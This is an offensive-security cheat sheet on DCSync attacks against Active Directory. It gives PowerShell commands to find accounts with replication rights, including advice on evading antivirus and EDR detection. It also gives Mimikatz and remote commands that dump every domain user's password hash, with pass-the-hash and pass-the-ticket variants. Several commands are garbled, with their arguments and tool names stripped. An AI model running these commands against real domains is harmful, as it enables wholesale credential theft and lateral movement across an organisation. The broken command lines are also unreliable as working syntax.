Skip to main content


DCSync Overview

DC Sync is a legitimate function of Active Directory environments where a domain controller will make a sync request from a another domain controller in the environment, as such this is not functionality that can be disabled.

Normally, this function is restricted to administrative users and groups, but on the occasion that domain ACLs are misconfigured and a user is granted rights to request this sync, it could result in the leaking of hashed credentials of all users in the domain.

Enumerating ACLs

PowerShell AD Module

I put this one first, because it is unlikely to be flagged by on-system AV/EDR, unlike PowerView, which is almost completely likely to get flagged and removed.

See PowerShell AD Module on Any Domain Host as Any User

# Assumes domain is
# List any objects with ACLs to perform a DC sync

Get-Acl "ad:\dc=contoso,dc=org" | 
Select -Expand access | 
Where { 
	$_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or `
    $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or `
    $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c" 
} | Select -Expand IdentityReference -Unique | Sort


# Assumes domain is
# Enumerate objects with ACLs to perform DC sync

Get-ObjectAcl -DistinguishedName "dc=contoso,dc=org" -ResolveGUIDs | 
Where {	$_.ObjectType -match 'replication-get' -or $_.ActiveDirectoryRights -match 'GenericAll' }

DCSync Attack

Mimikatz (Local)

If you've exploited a host where you have a TGT of a user who can DCSync, you can use Mimikatz to perform the attack.

# Assumes the domain is
# Dump all hashes from the domain controller

lsadump::dcsync / / /all /csv
# Assumes the domain is
# Dump all hashes from the domain controller
# PowerShell Invoke-Mimikatz

Invoke-Mimikatz 'lsadump::dcsync / / /all /csv' (Remote)

# Assumes domain is
# Password Authentication -outputfile 'dcsync.txt' ''

# Pass the hash -outputfile 'dcsync.txt' -hashes 'lm-hash':'nt-hash' ''

# Pass the ticket
# If proxying through jump host, add dc-fqdn to /etc/hosts
python -dc-ip domain-controller-ip -hashes lm-hash:nt-hash ''
export KRB5CCNAME='username.ccache' -k -outputfile 'something' ''